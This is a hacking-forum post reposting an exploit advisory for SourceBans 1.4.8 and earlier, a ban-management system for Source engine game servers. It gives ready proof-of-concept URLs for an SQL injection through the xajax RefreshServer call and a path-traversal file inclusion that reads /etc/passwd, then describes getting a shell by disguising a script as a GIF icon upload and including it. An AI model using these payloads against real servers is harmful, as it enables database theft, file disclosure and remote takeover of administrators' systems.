Jump to content
co4ie

SourceBans <= 1.4.8 SQL/LFI Injection

By co4ie, in Exploituri

Recommended Posts

co4ie Newbie

co4ie

Posted
Posted

# Exploit Title: SourceBans <= 1.4.8 SQL/LFI Injection

# Date: Dec. 6th 2011

# Author: Havok

# Software Link: SourceBans

# Version: <= 1.4.8

"- What is SourceBans?

SourceBans is a free global administration and banning system for Source engine based servers."

Vulnerabilities:

1°) SQL Injection:

Proof of concept: http://1m-4-1337-m8.c0m/index.php?xajax=RefreshServer&xajaxargs[]=1' <=== SQL Error w00t!

2°) LFI Injection:

Only works when you're authentified as root administrator or as somebody who is able to change the SourceBans theme :

Proof of concept: http://server/index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00

Note: There is also a possibility to get a shell by adding "GIF89a" at the very beginning of the shell,

renaming it to h4x0rz.gif and uploading it as an icon in the admin panel. Then include the file with the LFI and G4M3 0V3R :).

=> In memory of crashfr who will NEVER die. Merci pour tout mec! ;-))... R.I.P.

./EOF

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...